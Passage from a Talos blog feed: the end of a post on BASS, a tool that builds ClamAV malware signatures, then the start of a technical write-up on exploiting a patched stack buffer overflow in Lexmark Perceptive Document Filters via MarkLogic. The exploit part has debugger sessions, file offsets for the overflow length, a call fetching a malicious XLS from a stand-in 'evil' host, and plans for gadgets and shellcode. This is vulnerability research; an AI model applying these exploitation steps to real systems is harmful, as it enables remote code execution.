Additionally, a high number of signatures translates to an increased footprint of ClamAV's signature database in memory. For this reason, we would prefer to have have more pattern-based signatures, which are comparably faster and easier to maintain than bytecode signatures, but are able to identify a whole cluster of files instead of just a single file.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.ribhf5s2gk3v"&gt;BASS&lt;/h2&gt;&lt;br /&gt;BASS is meant to fill this gap. This framework is designed to generate ClamAV pattern signatures from chunks of binary executable code. &lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-psmrxw9tVRQ/WUltMweN-hI/AAAAAAAAARA/kIEHFSghNq8PA6PzQopBNLgoGbhrE5w9wCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="156" src="https://4.bp.blogspot.com/-psmrxw9tVRQ/WUltMweN-hI/AAAAAAAAARA/kIEHFSghNq8PA6PzQopBNLgoGbhrE5w9wCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;The framework ingests malware clusters. To keep the framework as simple and as flexible as possible, malware clustering is not part of BASS. The input interface is intentionally kept generic to be easily adaptable to new clustering sources. We currently use several cluster sources. A non-exhaustive list of our current sources is: Indicator of Compromise (IoC) clusters from our sandbox, structural hashing in case where we have a known malicious executable and find additional samples through structural similarity, and malware gathered from spam campaigns.&lt;br /&gt;&lt;br /&gt;In a first step, the malware files are unpacked with ClamAV's unpackers. ClamAV can unpack and extract a wide range of archive formats, but also packed executables (like UPX) and nested documents (such as an EXE file inside a Word document). The resulting artifacts are inspected to gather information. Currently we use the file size and the magic string from the Unix file tool in the filtering step.&lt;br /&gt;&lt;br /&gt;Next, the malware cluster is filtered. If files do not correspond to BASS' expected input (currently PE executables, though adding support for ELF and MACH-O binaries is trivial), they are removed from the cluster, or the cluster is outright rejected if not enough files remain.&lt;br /&gt;&lt;br /&gt;The filtered cluster then passes to the signature generation step. Here, the binaries are first disassembled. Currently we use IDA Pro as a disassembler, but other disassemblers like radare2 are able to produce the same information and could easily be swapped in as a replacement to IDA.&lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-FK8FMW-J4yg/WUltXJNmkbI/AAAAAAAAARI/4rl_B-yXw2EgQ2sc3sukhNP2QgM8XJAwwCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B3.jpg" imageanchor="1"&gt;&lt;img border="0" height="240" src="https://2.bp.blogspot.com/-FK8FMW-J4yg/WUltXJNmkbI/AAAAAAAAARI/4rl_B-yXw2EgQ2sc3sukhNP2QgM8XJAwwCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B3.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After disassembly, we need to find common code between the samples which can be used to generate signatures from. This step is necessary for two reasons.The first is because the signature generation algorithm is computationally very expensive and works well on short chunks. The second is because having a signature on code which is not only syntactically but also semantically similar is preferable. We use BinDiff as a code comparison tool. Again, the tool should be easily exchangeable, and we might integrate other comparison tools in the future.&lt;br /&gt;&lt;br /&gt;BinDiff compares each executable with every other in small clusters. In bigger clusters, comparisons are limited, as the number would explode. A graph is built from the function similarities where functions are the nodes and the similarity the edges. Finding a good common function amounts to finding a connected subgraph with high overall similarity.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-WVIP1nrvvZk/WUltgXBwPiI/AAAAAAAAARQ/f9HpN9vs1LoXHbW-Bp6v4QtNa5JbfAuaACK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B4.jpg" imageanchor="1"&gt;&lt;img border="0" height="284" src="https://1.bp.blogspot.com/-WVIP1nrvvZk/WUltgXBwPiI/AAAAAAAAARQ/f9HpN9vs1LoXHbW-Bp6v4QtNa5JbfAuaACK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B4.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;In the above example, the subgraph of ƒ1, ƒ2, ƒ4, ƒ6 is a good candidate for a common function, as the overall similarity is high.&lt;br /&gt;&lt;br /&gt;When a set of candidate functions in the binaries have been identified, the functions are checked against a function whitelist. This step helps to avoid generating signatures on benign library functions which have been statically linked into a sample. These functions are submitted to the &lt;a href="https://github.com/McGill-DMaS/Kam1n0-Plugin-IDA-Pro"&gt;Kam1n0&lt;/a&gt; instance, whose database we previously pre-populated with functions of known clean samples. If a clone of a function is found, the subgraph selection from above is repeated for the next-best subgraph. Otherwise, the function set is retained for the next step: signature generation.&lt;br /&gt;&lt;br /&gt;At this point, the actual signature generation can start. As ClamAV's pattern signatures are made to recognize subsequences in binary data, we apply an algorithm to all extracted functions to find the Longest Common Subsequence (LCS) between them (See the &lt;a href="https://www.blogger.com/blogger.g?blogID=1029833275466591797#h.qhyihbwtpikq"&gt;Appendix&lt;/a&gt; for the differences between a Longest Common Substring and a Longest Common Subsequence). &lt;br /&gt;&lt;br /&gt;As the algorithm is already computationally expensive for two samples and even more so for several samples, we implemented a heuristic version described by &lt;a href="https://static.googleusercontent.com/media/www.zynamics.com/en/downloads/blichmann-christian--diplomarbeit--final.pdf"&gt;C. Blichmann&lt;/a&gt;. An example output could look like that:&lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: red; font-size: 16px; font-weight: bold;"&gt;&lt;a href="http://3.bp.blogspot.com/-cR8uLAFf7E0/WUltory1lCI/AAAAAAAAARY/bNpLkAqrom4ipqjdM2aRm5K1F7kLEIVvgCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B6.jpg" imageanchor="1"&gt;&lt;img border="0" height="176" src="https://3.bp.blogspot.com/-cR8uLAFf7E0/WUltory1lCI/AAAAAAAAARY/bNpLkAqrom4ipqjdM2aRm5K1F7kLEIVvgCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B6.jpg" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;Finally, the signature needs to be tested before it is published. We automatically validate the signature against our false positive test set. For further scrutiny, we use Sigalyzer, a new functionality of our &lt;a href="https://github.com/Cisco-Talos/CASC"&gt;CASC IDA Pro ClamAV signature generation and analysis plugin&lt;/a&gt; (which will be updated later). Sigalyzer highlights the matched parts of a binary given a ClamAV signature triggering on that binary, and quickly gives the analyst a visual impression of the signature.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.p1y6216xvwbu"&gt;Architecture&lt;/h2&gt;&lt;br /&gt;BASS is implemented as a cluster of docker containers. The framework is written in python, and interacts with the tools it uses through web services. The architecture is inspired from &lt;a href="https://www.zynamics.com/vxclass.html"&gt;VxClass&lt;/a&gt;, which also used IDA Pro and BinDiff to generate ClamAV signatures, but was discontinued and, contrary to BASS, is not publicly available.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-ctgZ4k7Kgj0/WUltttQTW_I/AAAAAAAAARg/SqiNVl5cCYg60WrRQUfH__F3t57OSuVSQCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B7.jpg" imageanchor="1"&gt;&lt;img border="0" height="270" src="https://1.bp.blogspot.com/-ctgZ4k7Kgj0/WUltttQTW_I/AAAAAAAAARg/SqiNVl5cCYg60WrRQUfH__F3t57OSuVSQCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B7.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2 id="h.4qsgjhpd52du"&gt;Limitations&lt;/h2&gt;&lt;br /&gt;BASS will only work on binary executables because the signature is generated from the code section of the sample. Additionally, BASS will only analyze x86 and x86_64 binaries. Support for other architectures may be added in the future. &lt;br /&gt;&lt;br /&gt;We have observed that the framework does not work well on file infectors, which usually insert small and highly varying snippets of code in a host binary, and backdoors, which contain large amounts of (sometimes stolen) non-malicious binary code together with some malicious functions. We are working on improving the clustering step to deal with these issues.&lt;br /&gt;&lt;br /&gt;Finally, be aware that BASS is currently in Alpha stage and has some rough edges. Still, we hope to contribute to the community by open sourcing the framework and would gladly welcome any feedback and improvement suggestions.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.2ixwliz46arw"&gt;Appendix&lt;/h2&gt;&lt;br /&gt;&lt;h3 id="h.qhyihbwtpikq"&gt;Longest Common Substring versus Longest Common Subsequence&lt;/h3&gt;&lt;br /&gt;The following graphic illustrates the difference between a Longest Common Substring and a Longest Common Subsequence. In this blog post, we refer to the Longest Common Subsequence as LCS.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-bpEhcvlJZ-E/WUltzKWcDSI/AAAAAAAAARo/w-UwwajMo-ApxMciYHDQPg1wFjEVZg28ACK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B5.jpg" imageanchor="1"&gt;&lt;img border="0" height="328" src="https://4.bp.blogspot.com/-bpEhcvlJZ-E/WUltzKWcDSI/AAAAAAAAARo/w-UwwajMo-ApxMciYHDQPg1wFjEVZg28ACK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B5.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=_iH94chsP2c:aQh3r7ZaIBE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/_iH94chsP2c" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-20T14:47:55.641-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-pk1493FXOWQ/WUf8Wn4D6II/AAAAAAAABGA/PcekxM5hnPoEgzuJfyUoS3AiQvQqG72DQCLcBGAs/s72-c/BASS_logo_fullcolor_ondark.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/bass-signature.html</feedburner:origLink></item><item><title>Deep dive in Lexmark Perceptive Document Filters Exploitation</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/rf8H1U_G_y4/lexmark-perceptive-vuln-deep-dive.html</link><category>exploitation</category><category>Talos</category><category>vulndev</category><category>Vulnerability</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Wed, 14 Jun 2017 11:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-9128219403764961331</guid><description>&lt;i&gt;This post authored by Marcin Noga with contributions from &lt;a href="https://twitter.com/infosec_nick"&gt;Nick Biasini&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;h2 id="h.7ypzstvbxdpn"&gt;&lt;/h2&gt;&lt;h2 id="h.7ypzstvbxdpn"&gt;&lt;br /&gt;&lt;/h2&gt;&lt;h2 id="h.7ypzstvbxdpn"&gt;Introduction&lt;/h2&gt;Talos discovers and releases software vulnerabilities on a regular basis. We don't always publish a deep technical analysis of how the vulnerability was discovered or its potential impact. This blog will cover these technical aspects including discovery and exploitation. Before we deep dive into the technical aspects of exploitation, let's start with an introduction to Lexmark Perceptive Document Filters and MarkLogic. Specifically, how these products are connected and what their purpose is. There are articles across the Internet discussing these products and their purposes. Additionally, you can read the  &lt;a href="http://www.lexmark.com/en_us/partners/enterprise-software/technology-partners/oem-technologies/document-filters.html"&gt;Perceptive Documents Filters product description directly&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;In general Perceptive Document Filters are used in Big Data, eDiscovery, DLP, email archival, content management, business intelligence, and intelligent capture. There are 3 major companies with product offerings in this space. Lexmark is one of them with Oracle and HP being the other two.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Perceptive Document Filters are a set of libraries used to parse massive amounts of different types of file formats for multiple different purposes, some of which are listed above. As you can imagine being such a big player in the market increases the impact of a discovered vulnerability in this product. Examples of direct Lexmark solution clients are all over, one example of which can be found &lt;a href="http://www.businesswire.com/news/home/20061016005009/en/ISYS-Search-Software-Enables-Competitive-Advantage-LANsultant"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The company's customers include large organizations. The size and diversity of their clients was one of the reasons Talos decided to dive deeply on not just the vulnerability discovery process but also the details of the exploitation.&lt;br /&gt;&lt;br /&gt;An example of an affected product using Perceptive Filters is the Enterprise NoSQL database by MarkLogic. The combination of the way MarkLogic uses Lexmarks solution and the lack of basic mitigation techniques make MarkLogic a prime candidate to demonstrate the vulnerability and its impact.&lt;br /&gt;&lt;h2 id="h.sz7qu48hlso2"&gt;MarkLogic Impact&lt;/h2&gt;Before we get too deep into the technical aspects, a video demonstrating a working remote code execution exploit tested on MarkLogic 8.04 Linux x64:&lt;br /&gt;&lt;br /&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/ilABOvr3wPg?list=PLFT-9JpKjRTDn_qtGN238gzycJfaVzMqD" width="560"&gt;&lt;/iframe&gt; &lt;br /&gt;MarkLogic is just one of many products thatare using Lexmark's Perceptive Document Filters as a solution to extract metadata from different types of documents. We can find both the Perceptive Document Filters libraries as well as the converter binary in the Marklogic directory as shown below:&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~$ ls -l /opt/MarkLogic/Converters/cvtisys/&lt;br /&gt;total 154612&lt;br /&gt;-rwxr-xr-x 1 root root   188976  convert&lt;br /&gt;drwxr-xr-x 2 root root     4096  fonts&lt;br /&gt;-rwxr-xr-x 1 root root    45568  libISYS11df.so&lt;br /&gt;-rwxr-xr-x 1 root root 47818992  libISYSautocad.so&lt;br /&gt;-rwxr-xr-x 1 root root  9575776  libISYSgraphics.so&lt;br /&gt;-rwxr-xr-x 1 root root 12376664  libISYSpdf6.so&lt;br /&gt;-rwxr-xr-x 1 root root 11419576  libISYSreadershd.so&lt;br /&gt;-rwxr-xr-x 1 root root  5389896  libISYSreaders.so&lt;br /&gt;-rwxr-xr-x 1 root root 30264056  libISYSshared.so&lt;br /&gt;&lt;br /&gt;The first question we need to answer is how to force MarkLogic to use this converter.&lt;br /&gt;&lt;br /&gt;MarkLogic uses this converter everytime the XDMP API "&lt;a href="https://docs.marklogic.com/xdmp:document-filter"&gt;document-filter&lt;/a&gt;" is used.From documentation we know that this API filters a variety of document formats, extracts metadata and text, and returns XHTML. The extracted text has very little formatting, and is typically used for searching, classification, or other text processing. An example of the usage of this particular API is shown below and demonstrates the extraction of metadata from an untrusted source document.&lt;br /&gt;&lt;br /&gt;xdmp:document-filter(xdmp:http-get("http://www.evil.localdomain/malicious.xls")[2])&lt;br /&gt;&lt;br /&gt;When the above "document-filter" API is called, the MarkLogic daemon spawnsthe "convert" binary which usesthe Perceptive Document Filters libraries,which are responsible for pulling the metadata out from the referenced file.&lt;br /&gt;&lt;h3 id="h.4721wzfkbir4"&gt;Increased damage&lt;/h3&gt;Monitoring the 'convert' process when it gets spawned by the MarkLogic daemon, shows that the process is executed with the same privileges as the parent process, meaning that it is executed as `daemon`.This dramatically increases the impact of successful exploitation because we will immediately gain access as one of the highest privileged accountson the system.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-UclGlxM0MQA/WUFz6DsD83I/AAAAAAAABOc/7DxQjF_NTQo3IaTd-l_-Zr1w7M0pErlpQCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="471" data-original-width="1472" height="203" src="https://2.bp.blogspot.com/-UclGlxM0MQA/WUFz6DsD83I/AAAAAAAABOc/7DxQjF_NTQo3IaTd-l_-Zr1w7M0pErlpQCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Spawned convert process run with `daemon` privileges&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h2 id="h.x7a8pvup9x4c"&gt;&lt;br /&gt;Recon&lt;/h2&gt;During the research into this product we found multiple vulnerabilities in Lexmark libs, but to demonstrate the exploitation process we decided to use &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0172"&gt;TALOS-2016-0172 - Lexmark Perceptive Document Filters XLS Convert Code Execution Vulnerability&lt;/a&gt;. This particular vulnerability was patched on 08/06/2016. Running the `convert` binary under gdb and trying to pull out metadata from a malformed xls file we see the following:&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ cat config/config.cfg&lt;br /&gt;showhidden Visible&lt;br /&gt;inputfile /home/icewall/exploits/cvtisys/poc.xls&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ LD_LIBRARY_PATH=. gdb --args ./convert config/&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-FZ0DWlnhH78/WUF0GCwz_rI/AAAAAAAABOg/rLsycz40qkI_dSDk4MdGNR7kxvuq0SsgACLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="739" data-original-width="976" height="484" src="https://4.bp.blogspot.com/-FZ0DWlnhH78/WUF0GCwz_rI/AAAAAAAABOg/rLsycz40qkI_dSDk4MdGNR7kxvuq0SsgACLcBGAs/s640/image5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;After quick analysis of the above gdb state, we know that this is a classic stack based buffer overflow.Using `rr` we return to the moment where the `ret address` has been overwritten.&lt;br /&gt;&lt;br /&gt;(rr) watch *0x7ffffffed128&lt;br /&gt;Hardware watchpoint 1: *0x7ffffffed128&lt;br /&gt;(rr) rc&lt;br /&gt;Continuing.&lt;br /&gt;&lt;br /&gt;Warning: not running or target is remote&lt;br /&gt;Hardware watchpoint 1: *0x7ffffffed128&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-EKJxr0TCJek/WUF0OEhkq5I/AAAAAAAABOk/jbQj6g6lhgc4dsAYWQYg4RP3s6UI6rPXQCLcBGAs/s1600/image13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="861" data-original-width="1434" height="384" src="https://2.bp.blogspot.com/-EKJxr0TCJek/WUF0OEhkq5I/AAAAAAAABOk/jbQj6g6lhgc4dsAYWQYg4RP3s6UI6rPXQCLcBGAs/s640/image13.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Ok, so we have landed inside memcpy. The next step will be to check the exact memcpy parameters used for this operation.&lt;br /&gt;&lt;br /&gt;(rr) reverse-finish         &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-PcMZqw2DE6k/WUF0Uf46HzI/AAAAAAAABOo/xmR79lBTzZEXCBNih13XMNDbW7csU0pNwCLcBGAs/s1600/image20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="813" data-original-width="1156" height="450" src="https://4.bp.blogspot.com/-PcMZqw2DE6k/WUF0Uf46HzI/AAAAAAAABOo/xmR79lBTzZEXCBNih13XMNDbW7csU0pNwCLcBGAs/s640/image20.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;We see all parameters, now we need to track their origins in order to determine how much control we have on them. The advisories mention that the `size` parameter is read directly from the file and points to the function name where it happens, but below we will demonstrate how to find that place using the `rr` debugger.Seeing backtrace function names we can assume that the buffer size is first passed as a parameter in the `reader::escher::MsofbtDggContainer::Handle` function. Now we use reverse-finish a couple of times to return to the place inside `reader::escher::MsofbtDggContainer::Handle` where `ISYS_NS::CDataReader::Read` is called.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-qY45IUAtE8U/WUF0ZRrMYdI/AAAAAAAABOs/_VZop401pvgI2rNAy5TqtPmfQYaK5_PCgCLcBGAs/s1600/image23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="844" data-original-width="1440" height="374" src="https://3.bp.blogspot.com/-qY45IUAtE8U/WUF0ZRrMYdI/AAAAAAAABOs/_VZop401pvgI2rNAy5TqtPmfQYaK5_PCgCLcBGAs/s640/image23.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Here we see the memcpy `size` argument in the RDX register and also the place where it has been set: &lt;br /&gt;&lt;br /&gt;0x7ffff36185fa:        mov    edx,DWORD PTR [rsi+0x4]&lt;br /&gt;&lt;br /&gt;Next we return back to the address `0x7ffff36185fa` by leveraging 'rni'. Now checking the memory content pointed by `rsi+0x4` gives us :&lt;br /&gt;&lt;br /&gt;(rr) hexdump $rsi+0x4&lt;br /&gt;&lt;br /&gt;0x00007ffffffed144 : 00 03 00 00 00 12 00 00 00 00 00 00 00 00 00 00   ................&lt;br /&gt;&lt;br /&gt;As expected we have found the value of interest. Now we set a watchpoint on it and see where it has been set:&lt;br /&gt;&lt;br /&gt;(rr) watch *0x00007ffffffed144&lt;br /&gt;&lt;br /&gt;Hardware watchpoint 4: *0x00007ffffffed144&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-BzPIESO_vPE/WUF0fBZvIgI/AAAAAAAABOw/-cGEGn5mIhUkeToW1qXJr60k2hRB-kfWACLcBGAs/s1600/image22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="878" data-original-width="1491" height="376" src="https://2.bp.blogspot.com/-BzPIESO_vPE/WUF0fBZvIgI/AAAAAAAABOw/-cGEGn5mIhUkeToW1qXJr60k2hRB-kfWACLcBGAs/s640/image22.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;(rr) pdisass&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-ye-fd1ncSD8/WUF0uCyxXNI/AAAAAAAABO0/-x4dfxp74hwgUprKdp54QSfdUhTWwQ0JwCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="560" data-original-width="1059" height="338" src="https://3.bp.blogspot.com/-ye-fd1ncSD8/WUF0uCyxXNI/AAAAAAAABO0/-x4dfxp74hwgUprKdp54QSfdUhTWwQ0JwCLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now we clearly see that memcpy `size` argument is indeed directly read from file via the `common::StreamReader::readInt32` function inside `common::read_MSOFBH` and it is a 32-bit integer value. Looking for this value in the file returns too many offsets. However,  using a chain of values returned by all of these `readIntXX` functions givesus a direct offset of our `size` parameter location:&lt;br /&gt;&lt;br /&gt;common::StreamReader::readInt16(ISYS_NS::CDataReader&amp;amp;) -&amp;gt; 03 08&lt;br /&gt;common::StreamReader::readInt16(ISYS_NS::CDataReader&amp;amp;) -&amp;gt; 16 00&lt;br /&gt;common::StreamReader::readInt32(ISYS_NS::CDataReader&amp;amp;) -&amp;gt; 00 30 00 00&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-rP0CLDSJNhk/WUF01Su36sI/AAAAAAAABO4/cv59W63xbDg_4zpNycMoo605F3Q_5TSBACLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="57" data-original-width="617" height="58" src="https://1.bp.blogspot.com/-rP0CLDSJNhk/WUF01Su36sI/AAAAAAAABO4/cv59W63xbDg_4zpNycMoo605F3Q_5TSBACLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bingo! We see that these byte chains start at offset : 0xFCE and the `size` value param is at 0xFD2. This is confirmed when we return to the listing with the memcpy operation as shown below.&lt;br /&gt;&lt;br /&gt;[-------------------------------------code-------------------------------------]&lt;br /&gt;0x7ffff475ef59:        mov    rdx,r12&lt;br /&gt;0x7ffff475ef5c:        add    rsi,rax&lt;br /&gt;0x7ffff475ef5f:        mov    r15,r12&lt;br /&gt;=&amp;gt; 0x7ffff475ef62:        call   0x7ffff4714fc8 &amp;lt;memcpy@plt&amp;gt;&lt;br /&gt;0x7ffff475ef67:        mov    eax,DWORD PTR [rsp+0x38]&lt;br /&gt;0x7ffff475ef6b:        mov    rbp,r12&lt;br /&gt;0x7ffff475ef6e:        add    rbp,QWORD PTR [r13+0x20]&lt;br /&gt;0x7ffff475ef72:        add    DWORD PTR [rsp+0x4],ebx&lt;br /&gt;&lt;br /&gt;Guessed arguments:&lt;br /&gt;arg[0]: 0x7ffffffed020 --&amp;gt; 0x0&lt;br /&gt;arg[1]: 0x678490 --&amp;gt; 0x82000165300081&lt;br /&gt;arg[2]: 0x300 &lt;br /&gt;&lt;br /&gt;We noticed that `src buffer` == payload starts right after the `size` argument value at offset: 0xFD2. We will use OffVis to gain a bit more insight into the XLS structure around these values to allow for increases and make space for our gadgets and shellcode.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-0zdl4mOMeD4/WUF07KdsTvI/AAAAAAAABO8/wLBXtnJCqL4u_EipIzzkmvYwfsk8rPTqACLcBGAs/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="213" data-original-width="1381" height="98" src="https://3.bp.blogspot.com/-0zdl4mOMeD4/WUF07KdsTvI/AAAAAAAABO8/wLBXtnJCqL4u_EipIzzkmvYwfsk8rPTqACLcBGAs/s640/image14.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;We have now clear view on important structure fields. &lt;br /&gt;&lt;br /&gt;Now, one of the most important questions is whether or not we increase the value of the 'size' argument to allow for exploitation (we need more space to store our payload) while ensuring theXLS document will still be treated as valid by the Lexmark lib parser.In order to simplify this task and avoid dealing with the demanding XLS format we will create a simple script which is responsible for setting the `size` field value and according to its size overwrite original data in the file with my custom "A" string.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/--f8jDTWfMkI/WUF1AbiQveI/AAAAAAAABPA/VJ5TgfR516kQ-r9EM9pBxN0D9WrGH2B3wCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="599" data-original-width="619" height="618" src="https://2.bp.blogspot.com/--f8jDTWfMkI/WUF1AbiQveI/AAAAAAAABPA/VJ5TgfR516kQ-r9EM9pBxN0D9WrGH2B3wCLcBGAs/s640/image10.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;&lt;i&gt;Through trial and error process plus observing a bit more closer xls structure around payload we managed to achieve / guess size parameter value presented above.&lt;/i&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Now it's time to generate the payload.xls based on the template.xls file that originally caused the crash to occur.&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ ./explo_test.py&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ LD_LIBRARY_PATH=. ./convert test&lt;br /&gt;Segmentation fault&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-QWi0C67Y_O8/WUF1H24D7QI/AAAAAAAABPE/G8AiCk1dXUALNdB_21Ze1levSZbNlb7ogCLcBGAs/s1600/image24.png" imageanchor="1" style="margin-left: 1em; margin-right: 